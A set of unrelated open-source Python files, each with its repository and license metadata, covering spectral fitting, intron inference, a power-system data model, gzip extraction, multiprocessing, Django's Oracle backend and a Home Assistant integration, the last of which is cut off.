f = aud.download_file('https://github.com/pyspeckit/pyspeckit-example-files/raw/master/p-nh2d_spec.fits')
with fits.open(f) as ff:
ff.writeto('p-nh2d_spec.fits')
# Load the spectrum
spec = pyspeckit.Spectrum('p-nh2d_spec.fits')
# Determine rms from line free section and load into cube
rms = np.std(spec.data[10:340])
spec.error[:] = rms
# setup spectral axis
spec.xarr.refX = 110.153594*u.GHz
spec.xarr.velocity_convention = 'radio'
spec.xarr.convert_to_unit('km/s')
# define useful shortcuts for True and False
F=False
T=True
# Setup of matplotlib
import matplotlib.pyplot as plt
plt.ion()
# Add NH2D fitter
spec.Registry.add_fitter('nh2d_vtau', pyspeckit.models.nh2d.nh2d_vtau_fitter,4)
# run spectral fit using some reasonable guesses
spec.specfit(fittype='nh2d_vtau', guesses=[5.52, 2.15, 0.166, 0.09067],
verbose_level=4, signal_cut=1.5, limitedmax=[F,T,T,T], limitedmin=[T,T,T,T],
minpars=[0, 0, -1, 0.05], maxpars=[30.,50.,1,0.5], fixed=[F,F,F,F])
# plot best fit
spec.plotter(errstyle='fill')
spec.specfit.plot_fit()
#save figure
plt.savefig('example_p-NH2D.png')
|
jpinedaf/pyspeckit
|
examples/example_pNH2D.py
|
Python
|
mit
| 1,329
| 0.017306
|
#!/usr/bin/env python
import argparse
import os
import sqlite3
from Bio import SeqIO, SeqRecord, Seq
from Bio.Align.Applications import ClustalwCommandline
from Bio.Blast import NCBIXML
from Bio.Blast.Applications import NcbiblastnCommandline as bn
from Bio import AlignIO
AT_DB_FILE = 'AT.db'
BLAST_EXE = '~/opt/ncbi-blast-2.6.0+/bin/blastn'
BLAST_DB = '~/opt/ncbi-blast-2.6.0+/db/TAIR10'
CLUSTALW_EXE = '../../clustalw2'
def allgaps(seq):
"""Return a list with tuples containing all gap positions
and length. seq is a string."""
gaps = []
indash = False
for i, c in enumerate(seq):
if indash is False and c == '-':
c_ini = i
indash = True
dashn = 0
elif indash is True and c == '-':
dashn += 1
elif indash is True and c != '-':
indash = False
gaps.append((c_ini, dashn+1))
return gaps
def iss(user_seq):
"""Infer Splicing Sites from a FASTA file full of EST
sequences"""
with open('forblast','w') as forblastfh:
forblastfh.write(str(user_seq.seq))
blastn_cline = bn(cmd=BLAST_EXE, query='forblast',
db=BLAST_DB, evalue='1e-10', outfmt=5,
num_descriptions='1',
num_alignments='1', out='outfile.xml')
blastn_cline()
b_record = NCBIXML.read(open('outfile.xml'))
title = b_record.alignments[0].title
sid = title[title.index(' ')+1 : title.index(' |')]
# Polarity information of returned sequence.
# 1 = normal, -1 = reverse.
frame = b_record.alignments[0].hsps[0].frame[1]
# Run the SQLite query
conn = sqlite3.connect(AT_DB_FILE)
c = conn.cursor()
res_cur = c.execute('SELECT CDS, FULL_SEQ from seq '
'WHERE ID=?', (sid,))
cds, full_seq = res_cur.fetchone()
if cds=='':
print('There is no matching CDS')
exit()
# Check sequence polarity.
sidcds = '{0}-CDS'.format(sid)
sidseq = '{0}-SEQ'.format(sid)
if frame==1:
seqCDS = SeqRecord.SeqRecord(Seq.Seq(cds),
id = sidcds,
name = '',
description = '')
fullseq = SeqRecord.SeqRecord(Seq.Seq(full_seq),
id = sidseq,
name='',
description='')
else:
seqCDS = SeqRecord.SeqRecord(
Seq.Seq(cds).reverse_complement(),
id = sidcds, name='', description='')
fullseq = SeqRecord.SeqRecord(
Seq.Seq(full_seq).reverse_complement(),
id = sidseq, name = '', description='')
# A tuple with the user sequence and both AT sequences
allseqs = (record, seqCDS, fullseq)
with open('foralig.txt','w') as trifh:
# Write the file with the three sequences
SeqIO.write(allseqs, trifh, 'fasta')
# Do the alignment:
outfilename = '{0}.aln'.format(user_seq.id)
cline = ClustalwCommandline(CLUSTALW_EXE,
infile = 'foralig.txt',
outfile = outfilename,
)
cline()
# Walk over all sequences and look for query sequence
for seq in AlignIO.read(outfilename, 'clustal'):
if user_seq.id in seq.id:
seqstr = str(seq.seq)
gaps = allgaps(seqstr.strip('-'))
break
print('Original sequence: {0}'.format(user_seq.id))
print('\nBest match in AT CDS: {0}'.format(sid))
acc = 0
for i, gap in enumerate(gaps):
print('Putative intron #{0}: Start at position {1}, '
'length {2}'.format(i+1, gap[0]-acc, gap[1]))
acc += gap[1]
print('\n{0}'.format(seqstr.strip('-')))
print('\nAlignment file: {0}\n'.format(outfilename))
description = 'Program to infer intron position based on ' \
'Arabidopsis Thaliana genome'
parser = argparse.ArgumentParser(description=description)
ifh = 'Fasta formated file with sequence to search for introns'
parser.add_argument('input_file', help=ifh)
args = parser.parse_args()
seqhandle = open(args.input_file)
records = SeqIO.parse(seqhandle, 'fasta')
for record in records:
iss(record)
|
Serulab/Py4Bio
|
code/ch20/estimateintrons.py
|
Python
|
mit
| 4,302
| 0.006044
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM15.Element import Element
class Season(Element):
"""A specified time period of the year, e.g., Spring, Summer, Fall, WinterA specified time period of the year, e.g., Spring, Summer, Fall, Winter
"""
def __init__(self, name="winter", startDate='', endDate='', SeasonDayTypeSchedules=None, *args, **kw_args):
"""Initialises a new 'Season' instance.
@param name: Name of the Season Values are: "winter", "summer", "fall", "spring"
@param startDate: Date season starts
@param endDate: Date season ends
@param SeasonDayTypeSchedules: Schedules that use this Season.
"""
#: Name of the Season Values are: "winter", "summer", "fall", "spring"
self.name = name
#: Date season starts
self.startDate = startDate
#: Date season ends
self.endDate = endDate
self._SeasonDayTypeSchedules = []
self.SeasonDayTypeSchedules = [] if SeasonDayTypeSchedules is None else SeasonDayTypeSchedules
super(Season, self).__init__(*args, **kw_args)
_attrs = ["name", "startDate", "endDate"]
_attr_types = {"name": str, "startDate": str, "endDate": str}
_defaults = {"name": "winter", "startDate": '', "endDate": ''}
_enums = {"name": "SeasonName"}
_refs = ["SeasonDayTypeSchedules"]
_many_refs = ["SeasonDayTypeSchedules"]
def getSeasonDayTypeSchedules(self):
"""Schedules that use this Season.
"""
return self._SeasonDayTypeSchedules
def setSeasonDayTypeSchedules(self, value):
for x in self._SeasonDayTypeSchedules:
x.Season = None
for y in value:
y._Season = self
self._SeasonDayTypeSchedules = value
SeasonDayTypeSchedules = property(getSeasonDayTypeSchedules, setSeasonDayTypeSchedules)
def addSeasonDayTypeSchedules(self, *SeasonDayTypeSchedules):
for obj in SeasonDayTypeSchedules:
obj.Season = self
def removeSeasonDayTypeSchedules(self, *SeasonDayTypeSchedules):
for obj in SeasonDayTypeSchedules:
obj.Season = None
|
rwl/PyCIM
|
CIM15/IEC61970/LoadModel/Season.py
|
Python
|
mit
| 3,209
| 0.002805
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import argparse
import shutil
import urllib2
from contextlib import closing
from os.path import basename
import gzip
import tarfile
# argparse for information
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--directory", help="input directory")
parser.add_argument("-r", "--remove", action="store_true", help="removes the .gz file after extracting")
args = parser.parse_args()
# sanity check
if not len(sys.argv) > 1:
print "This script extracts all .gz files (not jet .tar) in a given directory, including sub directories."
print "Which directory (including sub directories) would you like to extract?"
parser.print_help()
sys.exit(0)
input = args.directory
# in case of a extraction error, caused by a downloading error, reload the file
def reload_file(file, dirpath):
print "reloading file: " + file
print 'ftp://ftp.rcsb.org/pub/pdb/data/structures/divided/' + dirpath + "/" + file
with closing(urllib2.urlopen('ftp://ftp.rcsb.org/pub/pdb/data/structures/divided/' + dirpath + "/" + file)) as r:
with open(dirpath + "/" + file, 'wb') as reloaded_file:
shutil.copyfileobj(r, reloaded_file)
with gzip.open((os.path.join(dirpath, file)), 'rb') as f:
file_content = f.read()
extracted_file = open((os.path.join(dirpath, os.path.splitext(file)[0])), 'w')
extracted_file.write(file_content)
extracted_file.close()
for dirpath, dir, files in os.walk(top=input):
for file in files:
if ".gz" in file:
print "extracting: " + (os.path.join(dirpath, file))
try:
with gzip.open((os.path.join(dirpath, file)), 'rb') as f:
file_content = f.read()
extracted_file = open((os.path.join(dirpath, os.path.splitext(file)[0])), 'w')
extracted_file.write(file_content)
extracted_file.close()
# tar = tarfile.open(os.path.join(dirpath, file))
# tar.extractall(path=dirpath)
# tar.close()
except:
reload_file(file, dirpath)
if args.remove:
os.remove(os.path.join(dirpath, file))
print "Extraction finished"
|
Twinstar2/Python_Master_scripts
|
data_mining/extract_all_targz_in_dir.py
|
Python
|
mit
| 2,292
| 0.004363
|
from multiprocessing import Process,Queue
import os
class TestMP:
def __init__(self,n):
self.n = n
@staticmethod
def worker(q):
"""worker function"""
# print('worker',*args)
# print("ppid= {} pid= {}".format(os.getppid(),os.getpid()))
q.put([1,'x',(os.getpid(),[])])
return
def main(self):
if __name__ == '__main__':
jobs = []
for i in range(self.n):
q = Queue()
p = Process(target=self.worker,args=(q,))
jobs.append((p,q))
p.start()
for i in range(self.n):
j=jobs.pop(0)
j[0].join()
msg = j[1].get()
print("job no {} ended, msg: {}".format(i,msg))
m=TestMP(10)
m.main()
|
vleo/vleo-notebook
|
test_python/multiprocessing/test_multiprocessing.py
|
Python
|
gpl-3.0
| 811
| 0.014797
|
"""
Oracle database backend for Django.
Requires cx_Oracle: http://cx-oracle.sourceforge.net/
"""
from __future__ import unicode_literals
import datetime
import decimal
import os
import platform
import sys
import warnings
from django.conf import settings
from django.db import utils
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.base.validation import BaseDatabaseValidation
from django.utils import six, timezone
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.duration import duration_string
from django.utils.encoding import force_bytes, force_text
from django.utils.functional import cached_property
def _setup_environment(environ):
# Cygwin requires some special voodoo to set the environment variables
# properly so that Oracle will see them.
if platform.system().upper().startswith('CYGWIN'):
try:
import ctypes
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading ctypes: %s; "
"the Oracle backend requires ctypes to "
"operate correctly under Cygwin." % e)
kernel32 = ctypes.CDLL('kernel32')
for name, value in environ:
kernel32.SetEnvironmentVariableA(name, value)
else:
os.environ.update(environ)
_setup_environment([
# Oracle takes client-side character set encoding from the environment.
('NLS_LANG', '.UTF8'),
# This prevents unicode from getting mangled by getting encoded into the
# potentially non-unicode database character set.
('ORA_NCHAR_LITERAL_REPLACE', 'TRUE'),
])
try:
import cx_Oracle as Database
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading cx_Oracle module: %s" % e)
# Some of these import cx_Oracle, so import them after checking if it's installed.
from .client import DatabaseClient # isort:skip
from .creation import DatabaseCreation # isort:skip
from .features import DatabaseFeatures # isort:skip
from .introspection import DatabaseIntrospection # isort:skip
from .operations import DatabaseOperations # isort:skip
from .schema import DatabaseSchemaEditor # isort:skip
from .utils import Oracle_datetime, convert_unicode # isort:skip
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
class _UninitializedOperatorsDescriptor(object):
def __get__(self, instance, owner):
# If connection.operators is looked up before a connection has been
# created, transparently initialize connection.operators to avert an
# AttributeError.
if instance is None:
raise AttributeError("operators not available as class attribute")
# Creating a cursor will initialize the operators.
instance.cursor().close()
return instance.__dict__['operators']
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'oracle'
# This dictionary maps Field objects to their associated Oracle column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
#
# Any format strings starting with "qn_" are quoted before being used in the
# output (the "qn_" prefix is stripped before the lookup is performed.
data_types = {
'AutoField': 'NUMBER(11)',
'BinaryField': 'BLOB',
'BooleanField': 'NUMBER(1)',
'CharField': 'NVARCHAR2(%(max_length)s)',
'CommaSeparatedIntegerField': 'VARCHAR2(%(max_length)s)',
'DateField': 'DATE',
'DateTimeField': 'TIMESTAMP',
'DecimalField': 'NUMBER(%(max_digits)s, %(decimal_places)s)',
'DurationField': 'INTERVAL DAY(9) TO SECOND(6)',
'FileField': 'NVARCHAR2(%(max_length)s)',
'FilePathField': 'NVARCHAR2(%(max_length)s)',
'FloatField': 'DOUBLE PRECISION',
'IntegerField': 'NUMBER(11)',
'BigIntegerField': 'NUMBER(19)',
'IPAddressField': 'VARCHAR2(15)',
'GenericIPAddressField': 'VARCHAR2(39)',
'NullBooleanField': 'NUMBER(1)',
'OneToOneField': 'NUMBER(11)',
'PositiveIntegerField': 'NUMBER(11)',
'PositiveSmallIntegerField': 'NUMBER(11)',
'SlugField': 'NVARCHAR2(%(max_length)s)',
'SmallIntegerField': 'NUMBER(11)',
'TextField': 'NCLOB',
'TimeField': 'TIMESTAMP',
'URLField': 'VARCHAR2(%(max_length)s)',
'UUIDField': 'VARCHAR2(32)',
}
data_type_check_constraints = {
'BooleanField': '%(qn_column)s IN (0,1)',
'NullBooleanField': '(%(qn_column)s IN (0,1)) OR (%(qn_column)s IS NULL)',
'PositiveIntegerField': '%(qn_column)s >= 0',
'PositiveSmallIntegerField': '%(qn_column)s >= 0',
}
operators = _UninitializedOperatorsDescriptor()
_standard_operators = {
'exact': '= %s',
'iexact': '= UPPER(%s)',
'contains': "LIKE TRANSLATE(%s USING NCHAR_CS) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'icontains': "LIKE UPPER(TRANSLATE(%s USING NCHAR_CS)) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': "LIKE TRANSLATE(%s USING NCHAR_CS) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'endswith': "LIKE TRANSLATE(%s USING NCHAR_CS) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'istartswith': "LIKE UPPER(TRANSLATE(%s USING NCHAR_CS)) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'iendswith': "LIKE UPPER(TRANSLATE(%s USING NCHAR_CS)) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
}
_likec_operators = _standard_operators.copy()
_likec_operators.update({
'contains': "LIKEC %s ESCAPE '\\'",
'icontains': "LIKEC UPPER(%s) ESCAPE '\\'",
'startswith': "LIKEC %s ESCAPE '\\'",
'endswith': "LIKEC %s ESCAPE '\\'",
'istartswith': "LIKEC UPPER(%s) ESCAPE '\\'",
'iendswith': "LIKEC UPPER(%s) ESCAPE '\\'",
})
# The patterns below are used to generate SQL pattern lookup clauses when
# the right-hand side of the lookup isn't a raw string (it might be an expression
# or the result of a bilateral transformation).
# In those cases, special characters for LIKE operators (e.g. \, *, _) should be
# escaped on database side.
#
# Note: we use str.format() here for readability as '%' is used as a wildcard for
# the LIKE operator.
pattern_esc = r"REPLACE(REPLACE(REPLACE({}, '\', '\\'), '%%', '\%%'), '_', '\_')"
_pattern_ops = {
'contains': "'%%' || {} || '%%'",
'icontains': "'%%' || UPPER({}) || '%%'",
'startswith': "{} || '%%'",
'istartswith': "UPPER({}) || '%%'",
'endswith': "'%%' || {}",
'iendswith': "'%%' || UPPER({})",
}
_standard_pattern_ops = {k: "LIKE TRANSLATE( " + v + " USING NCHAR_CS)"
" ESCAPE TRANSLATE('\\' USING NCHAR_CS)"
for k, v in _pattern_ops.items()}
_likec_pattern_ops = {k: "LIKEC " + v + " ESCAPE '\\'"
for k, v in _pattern_ops.items()}
Database = Database
SchemaEditorClass = DatabaseSchemaEditor
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
use_returning_into = self.settings_dict["OPTIONS"].get('use_returning_into', True)
self.features.can_return_id_from_insert = use_returning_into
self.ops = DatabaseOperations(self)
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = BaseDatabaseValidation(self)
def _connect_string(self):
settings_dict = self.settings_dict
if not settings_dict['HOST'].strip():
settings_dict['HOST'] = 'localhost'
if settings_dict['PORT'].strip():
dsn = Database.makedsn(settings_dict['HOST'],
int(settings_dict['PORT']),
settings_dict['NAME'])
else:
dsn = settings_dict['NAME']
return "%s/%s@%s" % (settings_dict['USER'],
settings_dict['PASSWORD'], dsn)
def get_connection_params(self):
conn_params = self.settings_dict['OPTIONS'].copy()
if 'use_returning_into' in conn_params:
del conn_params['use_returning_into']
return conn_params
def get_new_connection(self, conn_params):
conn_string = convert_unicode(self._connect_string())
return Database.connect(conn_string, **conn_params)
def init_connection_state(self):
cursor = self.create_cursor()
# Set the territory first. The territory overrides NLS_DATE_FORMAT
# and NLS_TIMESTAMP_FORMAT to the territory default. When all of
# these are set in single statement it isn't clear what is supposed
# to happen.
cursor.execute("ALTER SESSION SET NLS_TERRITORY = 'AMERICA'")
# Set Oracle date to ANSI date format. This only needs to execute
# once when we create a new connection. We also set the Territory
# to 'AMERICA' which forces Sunday to evaluate to a '1' in
# TO_CHAR().
cursor.execute(
"ALTER SESSION SET NLS_DATE_FORMAT = 'YYYY-MM-DD HH24:MI:SS'"
" NLS_TIMESTAMP_FORMAT = 'YYYY-MM-DD HH24:MI:SS.FF'"
+ (" TIME_ZONE = 'UTC'" if settings.USE_TZ else ''))
cursor.close()
if 'operators' not in self.__dict__:
# Ticket #14149: Check whether our LIKE implementation will
# work for this connection or we need to fall back on LIKEC.
# This check is performed only once per DatabaseWrapper
# instance per thread, since subsequent connections will use
# the same settings.
cursor = self.create_cursor()
try:
cursor.execute("SELECT 1 FROM DUAL WHERE DUMMY %s"
% self._standard_operators['contains'],
['X'])
except DatabaseError:
self.operators = self._likec_operators
self.pattern_ops = self._likec_pattern_ops
else:
self.operators = self._standard_operators
self.pattern_ops = self._standard_pattern_ops
cursor.close()
try:
self.connection.stmtcachesize = 20
except AttributeError:
# Django docs specify cx_Oracle version 4.3.1 or higher, but
# stmtcachesize is available only in 4.3.2 and up.
pass
# Ensure all changes are preserved even when AUTOCOMMIT is False.
if not self.get_autocommit():
self.commit()
def create_cursor(self):
return FormatStylePlaceholderCursor(self.connection)
def _commit(self):
if self.connection is not None:
try:
return self.connection.commit()
except Database.DatabaseError as e:
# cx_Oracle 5.0.4 raises a cx_Oracle.DatabaseError exception
# with the following attributes and values:
# code = 2091
# message = 'ORA-02091: transaction rolled back
# 'ORA-02291: integrity constraint (TEST_DJANGOTEST.SYS
# _C00102056) violated - parent key not found'
# We convert that particular case to our IntegrityError exception
x = e.args[0]
if hasattr(x, 'code') and hasattr(x, 'message') \
and x.code == 2091 and 'ORA-02291' in x.message:
six.reraise(utils.IntegrityError, utils.IntegrityError(*tuple(e.args)), sys.exc_info()[2])
raise
# Oracle doesn't support releasing savepoints. But we fake them when query
# logging is enabled to keep query counts consistent with other backends.
def _savepoint_commit(self, sid):
if self.queries_logged:
self.queries_log.append({
'sql': '-- RELEASE SAVEPOINT %s (faked)' % self.ops.quote_name(sid),
'time': '0.000',
})
def _set_autocommit(self, autocommit):
with self.wrap_database_errors:
self.connection.autocommit = autocommit
def check_constraints(self, table_names=None):
"""
To check constraints, we set constraints to immediate. Then, when, we're done we must ensure they
are returned to deferred.
"""
self.cursor().execute('SET CONSTRAINTS ALL IMMEDIATE')
self.cursor().execute('SET CONSTRAINTS ALL DEFERRED')
def is_usable(self):
try:
self.connection.ping()
except Database.Error:
return False
else:
return True
@cached_property
def oracle_full_version(self):
with self.temporary_connection():
return self.connection.version
@cached_property
def oracle_version(self):
try:
return int(self.oracle_full_version.split('.')[0])
except ValueError:
return None
class OracleParam(object):
"""
Wrapper object for formatting parameters for Oracle. If the string
representation of the value is large enough (greater than 4000 characters)
the input size needs to be set as CLOB. Alternatively, if the parameter
has an `input_size` attribute, then the value of the `input_size` attribute
will be used instead. Otherwise, no input size will be set for the
parameter when executing the query.
"""
def __init__(self, param, cursor, strings_only=False):
# With raw SQL queries, datetimes can reach this function
# without being converted by DateTimeField.get_db_prep_value.
if settings.USE_TZ and (isinstance(param, datetime.datetime) and
not isinstance(param, Oracle_datetime)):
if timezone.is_aware(param):
warnings.warn(
"The Oracle database adapter received an aware datetime (%s), "
"probably from cursor.execute(). Update your code to pass a "
"naive datetime in the database connection's time zone (UTC by "
"default).", RemovedInDjango20Warning)
param = param.astimezone(timezone.utc).replace(tzinfo=None)
param = Oracle_datetime.from_datetime(param)
if isinstance(param, datetime.timedelta):
param = duration_string(param)
if ' ' not in param:
param = '0 ' + param
string_size = 0
# Oracle doesn't recognize True and False correctly in Python 3.
# The conversion done below works both in 2 and 3.
if param is True:
param = 1
elif param is False:
param = 0
if hasattr(param, 'bind_parameter'):
self.force_bytes = param.bind_parameter(cursor)
elif isinstance(param, Database.Binary):
self.force_bytes = param
else:
# To transmit to the database, we need Unicode if supported
# To get size right, we must consider bytes.
self.force_bytes = convert_unicode(param, cursor.charset,
strings_only)
if isinstance(self.force_bytes, six.string_types):
# We could optimize by only converting up to 4000 bytes here
string_size = len(force_bytes(param, cursor.charset, strings_only))
if hasattr(param, 'input_size'):
# If parameter has `input_size` attribute, use that.
self.input_size = param.input_size
elif string_size > 4000:
# Mark any string param greater than 4000 characters as a CLOB.
self.input_size = Database.CLOB
else:
self.input_size = None
class VariableWrapper(object):
"""
An adapter class for cursor variables that prevents the wrapped object
from being converted into a string when used to instantiate an OracleParam.
This can be used generally for any other object that should be passed into
Cursor.execute as-is.
"""
def __init__(self, var):
self.var = var
def bind_parameter(self, cursor):
return self.var
def __getattr__(self, key):
return getattr(self.var, key)
def __setattr__(self, key, value):
if key == 'var':
self.__dict__[key] = value
else:
setattr(self.var, key, value)
class FormatStylePlaceholderCursor(object):
"""
Django uses "format" (e.g. '%s') style placeholders, but Oracle uses ":var"
style. This fixes it -- but note that if you want to use a literal "%s" in
a query, you'll need to use "%%s".
We also do automatic conversion between Unicode on the Python side and
UTF-8 -- for talking to Oracle -- in here.
"""
charset = 'utf-8'
def __init__(self, connection):
self.cursor = connection.cursor()
# Necessary to retrieve decimal values without rounding error.
self.cursor.numbersAsStrings = True
# Default arraysize of 1 is highly sub-optimal.
self.cursor.arraysize = 100
def _format_params(self, params):
try:
return {k: OracleParam(v, self, True) for k, v in params.items()}
except AttributeError:
return tuple(OracleParam(p, self, True) for p in params)
def _guess_input_sizes(self, params_list):
# Try dict handling; if that fails, treat as sequence
if hasattr(params_list[0], 'keys'):
sizes = {}
for params in params_list:
for k, value in params.items():
if value.input_size:
sizes[k] = value.input_size
self.setinputsizes(**sizes)
else:
# It's not a list of dicts; it's a list of sequences
sizes = [None] * len(params_list[0])
for params in params_list:
for i, value in enumerate(params):
if value.input_size:
sizes[i] = value.input_size
self.setinputsizes(*sizes)
def _param_generator(self, params):
# Try dict handling; if that fails, treat as sequence
if hasattr(params, 'items'):
return {k: v.force_bytes for k, v in params.items()}
else:
return [p.force_bytes for p in params]
def _fix_for_params(self, query, params):
# cx_Oracle wants no trailing ';' for SQL statements. For PL/SQL, it
# it does want a trailing ';' but not a trailing '/'. However, these
# characters must be included in the original query in case the query
# is being passed to SQL*Plus.
if query.endswith(';') or query.endswith('/'):
query = query[:-1]
if params is None:
params = []
query = convert_unicode(query, self.charset)
elif hasattr(params, 'keys'):
# Handle params as dict
args = {k: ":%s" % k for k in params.keys()}
query = convert_unicode(query % args, self.charset)
else:
# Handle params as sequence
args = [(':arg%d' % i) for i in range(len(params))]
query = convert_unicode(query % tuple(args), self.charset)
return query, self._format_params(params)
def execute(self, query, params=None):
query, params = self._fix_for_params(query, params)
self._guess_input_sizes([params])
try:
return self.cursor.execute(query, self._param_generator(params))
except Database.DatabaseError as e:
# cx_Oracle <= 4.4.0 wrongly raises a DatabaseError for ORA-01400.
if hasattr(e.args[0], 'code') and e.args[0].code == 1400 and not isinstance(e, IntegrityError):
six.reraise(utils.IntegrityError, utils.IntegrityError(*tuple(e.args)), sys.exc_info()[2])
raise
def executemany(self, query, params=None):
if not params:
# No params given, nothing to do
return None
# uniform treatment for sequences and iterables
params_iter = iter(params)
query, firstparams = self._fix_for_params(query, next(params_iter))
# we build a list of formatted params; as we're going to traverse it
# more than once, we can't make it lazy by using a generator
formatted = [firstparams] + [self._format_params(p) for p in params_iter]
self._guess_input_sizes(formatted)
try:
return self.cursor.executemany(query,
[self._param_generator(p) for p in formatted])
except Database.DatabaseError as e:
# cx_Oracle <= 4.4.0 wrongly raises a DatabaseError for ORA-01400.
if hasattr(e.args[0], 'code') and e.args[0].code == 1400 and not isinstance(e, IntegrityError):
six.reraise(utils.IntegrityError, utils.IntegrityError(*tuple(e.args)), sys.exc_info()[2])
raise
def fetchone(self):
row = self.cursor.fetchone()
if row is None:
return row
return _rowfactory(row, self.cursor)
def fetchmany(self, size=None):
if size is None:
size = self.arraysize
return tuple(_rowfactory(r, self.cursor) for r in self.cursor.fetchmany(size))
def fetchall(self):
return tuple(_rowfactory(r, self.cursor) for r in self.cursor.fetchall())
def close(self):
try:
self.cursor.close()
except Database.InterfaceError:
# already closed
pass
def var(self, *args):
return VariableWrapper(self.cursor.var(*args))
def arrayvar(self, *args):
return VariableWrapper(self.cursor.arrayvar(*args))
def __getattr__(self, attr):
if attr in self.__dict__:
return self.__dict__[attr]
else:
return getattr(self.cursor, attr)
def __iter__(self):
return CursorIterator(self.cursor)
class CursorIterator(six.Iterator):
"""
Cursor iterator wrapper that invokes our custom row factory.
"""
def __init__(self, cursor):
self.cursor = cursor
self.iter = iter(cursor)
def __iter__(self):
return self
def __next__(self):
return _rowfactory(next(self.iter), self.cursor)
def _rowfactory(row, cursor):
# Cast numeric values as the appropriate Python type based upon the
# cursor description, and convert strings to unicode.
casted = []
for value, desc in zip(row, cursor.description):
if value is not None and desc[1] is Database.NUMBER:
precision, scale = desc[4:6]
if scale == -127:
if precision == 0:
# NUMBER column: decimal-precision floating point
# This will normally be an integer from a sequence,
# but it could be a decimal value.
if '.' in value:
value = decimal.Decimal(value)
else:
value = int(value)
else:
# FLOAT column: binary-precision floating point.
# This comes from FloatField columns.
value = float(value)
elif precision > 0:
# NUMBER(p,s) column: decimal-precision fixed point.
# This comes from IntField and DecimalField columns.
if scale == 0:
value = int(value)
else:
value = decimal.Decimal(value)
elif '.' in value:
# No type information. This normally comes from a
# mathematical expression in the SELECT list. Guess int
# or Decimal based on whether it has a decimal point.
value = decimal.Decimal(value)
else:
value = int(value)
elif desc[1] in (Database.STRING, Database.FIXED_CHAR,
Database.LONG_STRING):
value = to_unicode(value)
casted.append(value)
return tuple(casted)
def to_unicode(s):
"""
Convert strings to Unicode objects (and return all other data types
unchanged).
"""
if isinstance(s, six.string_types):
return force_text(s)
return s
|
Vvucinic/Wander
|
venv_2_7/lib/python2.7/site-packages/Django-1.9-py2.7.egg/django/db/backends/oracle/base.py
|
Python
|
artistic-2.0
| 24,995
| 0.00164
|
"""Services for ScreenLogic integration."""
import logging
from screenlogicpy import ScreenLogicError
import voluptuous as vol
from homeassistant.core import HomeAssistant, ServiceCall, callback
from homeassistant.exceptions import HomeAssistantError
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.service import async_extract_config_entry_ids
from .const import (
ATTR_COLOR_MODE,
DOMAIN,
SERVICE_SET_COLOR_MODE,
SUPPORTED_COLOR_MODES,
)
_LOGGER = logging.getLogger(__name__)
SET_COLOR_MODE_SCHEMA = cv.make_entity_service_schema(
{
vol.Required(ATTR_COLOR_MODE): vol.In(SUPPORTED_COLOR_MODES),
},
)
@callback
def async_load_screenlogic_services(hass: HomeAssistant):
"""Set up services for the ScreenLogic integration."""
if hass.services.has_service(DOMAIN, SERVICE_SET_COLOR_MODE):
# Integration-level services have already been added. Return.
return
async def extract_screenlogic_config_entry_ids(service_call: ServiceCall):
return [
entry_id
for entry_id in await async_extract_config_entry_ids(hass, service_call)
if (entry := hass.config_entries.async_get_entry(entry_id))
and entry.domain == DOMAIN
]
async def async_set_color_mode(service_call: ServiceCall) -> None:
if not (
screenlogic_entry_ids := await extract_screenlogic_config_entry_ids(
service_call
)
):
raise HomeAssistantError(
f"Failed to call service '{SERVICE_SET_COLOR_MODE}'. Config entry for target not found"
)
color_num = SUPPORTED_COLOR_MODES[service_call.data[ATTR_COLOR_MODE]]
for entry_id in screenlogic_entry_ids:
coordinator = hass.data[DOMAIN][entry_id]
_LOGGER.debug(
"Service %s called on %s with mode %s",
SERVICE_SET_COLOR_MODE,
coordinator.gateway.name,
color_num,
)
try:
if not await coordinator.gateway.async_set_color_lights(color_num):
raise HomeAssistantError(
f"Failed to call service '{SERVICE_SET_COLOR_MODE}'"
)
# Debounced refresh to catch any secondary
# changes in the device
await coordinator.async_request_refresh()
except ScreenLogicError as error:
raise HomeAssistantError(error) from error
hass.services.async_register(
DOMAIN, SERVICE_SET_COLOR_MODE, async_set_color_mode, SET_COLOR_MODE_SCHEMA
)
@callback
def async_unload_screenlogic_services(hass: HomeAssistant):
"""Unload services for the ScreenLogic integration."""
if hass.data[DOMAIN]:
